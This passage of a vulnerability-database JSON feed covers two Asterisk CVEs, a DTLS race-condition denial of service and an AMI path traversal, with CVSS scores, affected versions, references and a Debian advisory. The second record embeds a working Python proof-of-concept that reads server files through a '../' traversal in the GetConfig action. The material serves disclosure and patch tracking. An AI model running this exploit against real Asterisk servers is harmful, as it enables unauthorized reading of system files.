{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "18.9"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "19.0.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "18.20.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "21.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "13.13.0"
},
{
"model": "certified asterisk",
"scope": null,
"trust": 0.8,
"vendor": "sangoma",
"version": null
},
{
"model": "asterisk",
"scope": null,
"trust": 0.8,
"vendor": "digium",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Debian",
"sources": [
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 0.1
},
"cve": "CVE-2023-49786",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.2,
"id": "CVE-2023-49786",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2023-49786",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 5.9,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2023-49786",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2023-49786",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2023-49786",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-49786",
"trust": 0.8,
"value": "Medium"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6. Digium of Asterisk Race condition vulnerabilities exist in products from multiple vendors.Service operation interruption (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1 security@debian.org\nhttps://www.debian.org/security/ Markus Koschany\nJanuary 04, 2024 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nCVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-37457\n\n The \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed\n the available buffer space for storing the new value of a header. By doing\n so this can overwrite memory or cause a crash. This is not externally\n exploitable, unless dialplan is explicitly written to update a header based\n on data from an outside source. If the \u0027update\u0027 functionality is not used\n the vulnerability does not occur. \n\nCVE-2023-38703\n\n PJSIP is a free and open source multimedia communication library written in\n C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n higher level media transport which is stacked upon a lower level media\n transport such as UDP and ICE. Currently a higher level transport is not\n synchronized with its lower level transport that may introduce a\n use-after-free issue. This vulnerability affects applications that have\n SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n transport other than UDP. This vulnerability\u2019s impact may range from\n unexpected application termination to control flow hijack/memory\n corruption. \n\nCVE-2023-49294\n\n It is possible to read any arbitrary file even when the `live_dangerously`\n option is not enabled. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-49786"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-49786",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "176251",
"trust": 1.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2023/12/15/7",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-024446",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "176383",
"trust": 0.1
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"id": "VAR-202312-0487",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.75
},
"last_update_date": "2024-08-14T14:30:07.981000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-703",
"trust": 1.0
},
{
"problemtype": "CWE-362",
"trust": 1.0
},
{
"problemtype": "Race condition (CWE-362) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/176251/asterisk-20.1.0-denial-of-service.html"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2023/dec/24"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"trust": 1.8,
"url": "https://github.com/enablesecurity/advisories/tree/master/es2023-01-asterisk-dtls-hello-race"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-hxj9-xwr8-w8pq"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/asterisk"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"date": "2024-01-05T14:31:02",
"db": "PACKETSTORM",
"id": "176383"
},
{
"date": "2023-12-14T20:15:52.927000",
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-31T06:13:00",
"db": "JVNDB",
"id": "JVNDB-2023-024446"
},
{
"date": "2023-12-29T00:15:50.043000",
"db": "NVD",
"id": "CVE-2023-49786"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Vulnerabilities related to race conditions in products from multiple vendors such as",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-024446"
}
],
"trust": 0.8
}
}
VAR-202312-2340
Vulnerability from variot - Updated: 2024-08-14 14:30Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the live_dangerously is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. # Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)
Date: 2023-03-26
Exploit Author: Sean Pesce
Vendor Homepage: https://asterisk.org/
Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/
Version: 18.20.0
Tested on: Debian Linux
CVE: CVE-2023-49294
!/usr/bin/env python3
Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that
facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of
file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar
to the common INI configuration format.
References:
https://nvd.nist.gov/vuln/detail/CVE-2023-49294
https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f
https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/
import argparse import getpass import socket import sys
CVE_ID = 'CVE-2023-49294'
DEFAULT_PORT = 5038 DEFAULT_FILE = '/etc/hosts' DEFAULT_ACTION_ID = 0 DEFAULT_TCP_READ_SZ = 1048576 # 1MB
def ami_msg(action, args, encoding='utf8'): assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}' assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}' if 'ActionID' not in args: args['ActionID'] = 0 line_sep = '\r\n' data = f'Action: {action}{line_sep}' for a in args: data += f'{a}: {args[a]}{line_sep}' data += line_sep return data.encode(encoding)
def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ): assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}' sock.sendall(data) resp = b'' while not resp.endswith(b'\r\n\r\n'): resp += sock.recv(read_sz) return resp
if name == 'main': # Parse command-line arguments argparser = argparse.ArgumentParser() argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server') argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT) argparser.add_argument('-u', '--user', type=str, help=f'Asterisk AMI user', required=True) argparser.add_argument('-P', '--password', type=str, help=f'Asterisk AMI secret', default=None) argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE) argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID) if '-h' in sys.argv or '--help' in sys.argv: print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr) argparser.print_help() sys.exit(0) args = argparser.parse_args()
# Validate command-line arguments
assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}'
args.host = socket.gethostbyname(args.host)
if args.password is None:
args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ')
print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr)
print(f'[INFO] Connecting to Asterisk AMI: {args.user}@{args.host}:{args.port}', file=sys.stderr)
# Connect to the Asterisk AMI server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((args.host, args.port))
# Read server banner
banner = sock.recv(DEFAULT_TCP_READ_SZ)
print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr)
# Authenticate to the Asterisk AMI server
login_msg = ami_msg('Login', {'Username':args.user,'Secret':args.password})
login_resp = tcp_send_rcv(sock, login_msg)
while b'Authentication' not in login_resp:
login_resp = tcp_send_rcv(sock, b'')
if b'Authentication accepted' not in login_resp:
print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr)
sys.exit(1)
#print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr)
print(f'[INFO] Login success', file=sys.stderr)
# Obtain file data via path traversal
traversal = '../../../../../../../../'
cfg_msg = ami_msg('GetConfig', {
'ActionID': args.action_id,
'Filename': f'{traversal}{args.file}',
#'Category': 'default',
#'Filter': 'name_regex=value_regex,',
})
resp = tcp_send_rcv(sock, cfg_msg)
while b'Response' not in resp:
resp = tcp_send_rcv(sock, b'')
print(f'', file=sys.stderr)
print(f'{resp.decode("utf8")}')
if b'Error' in resp:
sys.exit(1)
pass # Done
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq
Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033
Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.
CVE-2023-37457
The 'update' functionality of the PJSIP_HEADER dialplan function can exceed
the available buffer space for storing the new value of a header. By doing
so this can overwrite memory or cause a crash. This is not externally
exploitable, unless dialplan is explicitly written to update a header based
on data from an outside source. If the 'update' functionality is not used
the vulnerability does not occur.
CVE-2023-38703
PJSIP is a free and open source multimedia communication library written in
C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
higher level media transport which is stacked upon a lower level media
transport such as UDP and ICE. Currently a higher level transport is not
synchronized with its lower level transport that may introduce a
use-after-free issue. This vulnerability affects applications that have
SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
transport other than UDP. This vulnerability’s impact may range from
unexpected application termination to control flow hijack/memory
corruption.
CVE-2023-49786
Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.
For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.
We recommend that you upgrade your asterisk packages.
For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202312-2340",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "20.5.1"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "16.8.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "18.9"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "19.0.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "18.20.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "21.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "13.13.0"
},
{
"model": "asterisk",
"scope": null,
"trust": 0.8,
"vendor": "digium",
"version": null
},
{
"model": "certified asterisk",
"scope": null,
"trust": 0.8,
"vendor": "sangoma",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sean Pesce",
"sources": [
{
"db": "PACKETSTORM",
"id": "177819"
}
],
"trust": 0.1
},
"cve": "CVE-2023-49294",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2023-49294",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2023-49294",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-49294",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2023-49294",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2023-49294",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2023-49294",
"trust": 0.8,
"value": "High"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. # Exploit Title: Asterisk AMI - Partial File Content \u0026 Path Disclosure (Authenticated)\n# Date: 2023-03-26\n# Exploit Author: Sean Pesce\n# Vendor Homepage: https://asterisk.org/\n# Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/\n# Version: 18.20.0\n# Tested on: Debian Linux\n# CVE: CVE-2023-49294\n\n#!/usr/bin/env python3\n#\n# Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that\n# facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of\n# file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar\n# to the common INI configuration format. \n#\n# References:\n# https://nvd.nist.gov/vuln/detail/CVE-2023-49294\n# https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\n# 